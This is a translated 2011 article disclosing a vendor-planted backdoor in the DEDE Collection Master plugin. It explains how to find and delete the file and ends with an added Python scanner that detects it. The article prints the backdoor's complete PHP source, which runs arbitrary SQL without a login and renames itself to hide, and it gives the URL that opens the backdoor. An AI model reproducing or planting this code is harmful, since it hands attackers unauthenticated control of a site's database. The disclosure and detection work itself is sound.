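How to Remove the Backdoor the Vendor Left in DEDE采集大師 (DEDE Collection Master)
Updated: 2011-01-08 00:03:07 Author:
Frankly, when a program ships with a deliberately planted backdoor, the best course is simply not to use it. This backdoor has been found, but who knows whether the next so-called new version will come with even more of them.
Removing the vendor backdoor: right after installing Collection Master, delete the file dedesql.query.php in the include directory. If the product was installed earlier, the file may already have been renamed to arc.sqlquery.class.php; find it and delete it. This file can be used to query the site's database without any login check, and to update, delete and read data. You can test for yourself whether this is as I describe. Method:
http://your-domain.com/include/dedesql.query.php.php?dopost=viewinfo
Enter the URL above to open the backdoor interface.
The code of the backdoor file is as follows: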
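<?php
// Bootstrap only: nothing below checks a login session, which is why every
// $dopost action in this file can be used without authentication.
require_once(dirname(__FILE__)."/../include/common.inc.php");
if(empty($dopost))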
{
$dopost = "";
}
if($dopost=="rename")
{
if(rename('dedesql.query.php','arc.sqlquery.class.php')){
echo "成功!";
}else{
echo "失敗!";
}
exit();
}
if($dopost=="viewinfo")
{
if(empty($tablename))
{
echo "沒有指定表名!";
}
else
{
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);
$dsql->Execute('me');
$row2 = $dsql->GetArray('me',MYSQL_BOTH);
$ctinfo = $row2[1];
echo "<xmp>".trim($ctinfo)."</xmp>";
}
exit();
}
if($dopost=="index")
{
require_once(DEDEINC.'/arc.partview.class.php');
$envs = $_sys_globals = array();
$envs['aid'] = 0;
$pv = new PartView();
$row = $pv->dsql->GetOne('Select * From `#@__homepageset`');
$templet = str_replace("{style}",$cfg_df_style,$row['templet']);
$homeFile = dirname(__FILE__).'/'.$row['position'];
$homeFile = str_replace("http://","/",str_replace("\\","/",$homeFile));
$fp = fopen($homeFile,'w') or die("無法更新網站主頁到:$homeFile 位置");
fclose($fp);
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet;
$pv->SetTemplet($tpl);
$pv->SaveToHtml($homeFile);
$pv->Close();
echo "成功更新首頁!";
exit();
}
else if($dopost=="query")
{
$sqlquery = trim(stripslashes($sqlquery));
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery))
{
echo "<span style='font-size:10pt'>刪除'數據表'或'數據庫'的語句不允許在這里執行。</span>";
exit();
}
if(eregi("^select ",$sqlquery))
{
$dsql->SetQuery($sqlquery);
$dsql->Execute();
if($dsql->GetTotalRow()<=0)
{
echo "運行SQL:{$sqlquery},無返回記錄!";
}
else
{
echo "運行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."條記錄,最大返回100條!";
}
$j = 0;
while($row = $dsql->GetArray())
{
$j++;
if($j>100)
{
break;
}
echo "<hr size=1 width='100%'/>";
echo "記錄:$j";
echo "<hr size=1 width='100%'/>";
foreach($row as $k=>$v)
{
echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n";
}
}
exit();
}
if($querytype==2)
{
$sqlquery = str_replace("\r","",$sqlquery);
$sqls = split(";[ \t]{0,}\n",$sqlquery);
$nerrCode = "";$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q=="")
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError());
if($errCode=="")
{
$i++;
}
else
{
$nerrCode .= "執行: <font color='blue'>$q</font> 出錯,錯誤提示:<font color='red'>".$errCode."</font><br>";
}
}
echo "成功執行{$i}個SQL語句!<br><br>";
echo $nerrCode;
}
else
{
$dsql->ExecuteNoneQuery($sqlquery);
$nerrCode = trim($dsql->GetError());
echo "成功執行1個SQL語句!<br><br>";
echo $nerrCode;
}
exit();
}
if($dopost=="view")
{
;echo '<html>
<head>
<meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'>
<title>SQL命令行工具</title>
<link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'>
</head>
<body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'>
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA">
<tr>
<td height="19" background="img/tbg.gif">
<table width="96%" border="0" cellspacing="1" cellpadding="1">
<tr>
<td width="24%"><strong>SQL命令運行器:</strong></td>
<td width="76%" align="right"> <b><a href="sys_data.php"><u>數據備份</u></a></b>
| <b><a href="sys_data_revert.php"><strong><u>數據還原</u></strong></a></b>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="200" bgcolor="#FFFFFF" valign="top">
<table width="100%" border="0" cellspacing="4" cellpadding="2">
<form action="" method="post" name="infoform" target="stafrm">
<input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' />
<tr bgcolor="#F3FBEC">
<td width="15%" height="24" align="center">系統的表信息:</td>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="35%">
<select name="tablename" id="tablename" style="width:100%" size="6">
';
$dsql->SetQuery("Show Tables");
$dsql->Execute('t');
while($row = $dsql->GetArray('t',MYSQL_BOTH))
{
$dsql->SetQuery("Select count(*) From ".$row[0]);
$dsql->Execute('n');
$row2 = $dsql->GetArray('n',MYSQL_BOTH);
$dd = $row2[0];
echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n";
}
;echo ' </select>
</td>
<td width="2%"> </td>
<td width="63%" valign="bottom">
<div style="float:left;margin-right:20px;">
<input type="Submit" name="Submit1" value="優化選中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" />
<br />
<input type="Submit" name="Submit2" value="修復選中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" />
<br />
<input type="Submit" name="Submit3" value="查看表結構" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" />
</div>
<div style="float:left">
<input type="Submit" name="Submit5" value="優化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" />
<br />
<input type="Submit" name="Submit6" value="修復全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" />
</div>
</td>
</tr>
</table></td>
</tr>
<tr>
<td height="200" align="center">返回信息:</td>
<td>
<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe>
</td>
</tr>
</form>
<form action="" method="post" name="form1" target="stafrm">
<input type=\'hidden\' name=\'dopost\' value=\'query\'>
<tr>
<td height="24" colspan="2" bgcolor="#F3FBEC"><strong>運行SQL命令行:
<input name="querytype" type="radio" class="np" value="0">
單行命令(支持簡單查詢)
<input name="querytype" type="radio" class="np" value="2" checked>
多行命令</strong></td>
</tr>
<tr>
<td height="118" colspan="2">
<textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea>
</td>
</tr>
<tr>
<td height="53" align="center"> </td>
<td>
<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' />
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</body>
</html>
';}
?>
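The removal step depends on finding the file even after its `rename` action has changed the name, so this added example (not part of the original article or of the product) scans a web root for both file names the article gives and for two content markers taken from the source above. The function names and the choice of markers are assumptions of this sketch; a hit on content alone can also be a legitimate admin-side SQL tool and should be reviewed by hand.

```python
import os
import re

# File names from the article: the original name and the name the
# backdoor's own "rename" action gives it.
KNOWN_NAMES = {"dedesql.query.php", "arc.sqlquery.class.php"}

# Content markers chosen for this sketch from the backdoor source shown in the
# article. A copy renamed to something else still matches these.
MARKERS = {
    "self-rename": re.compile(rb"rename\(\s*['\"]dedesql\.query\.php['\"]"),
    "raw-sql-exec": re.compile(rb"ExecuteNoneQuery\(\s*\$sqlquery\s*\)"),
}


def scan_file(path):
    """Return the reasons a file looks like the backdoor (empty list if none)."""
    reasons = []
    if os.path.basename(path).lower() in KNOWN_NAMES:
        reasons.append("known-name")
    try:
        with open(path, "rb") as fh:
            data = fh.read(1024 * 1024)  # the backdoor is small; cap the read
    except OSError:
        return reasons  # unreadable file: report the name match, if any
    reasons += [name for name, rx in MARKERS.items() if rx.search(data)]
    return reasons


def scan_tree(root):
    """Walk root and return {relative_path: reasons} for suspicious .php files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fname)
            reasons = scan_file(full)
            if reasons:
                hits[os.path.relpath(full, root)] = reasons
    return hits


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, why in sorted(scan_tree(root).items()):
        print(f"{rel}: {', '.join(why)}")
```

Run it with the site's document root as the only argument; each output line is a relative path followed by the reasons it was flagged.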

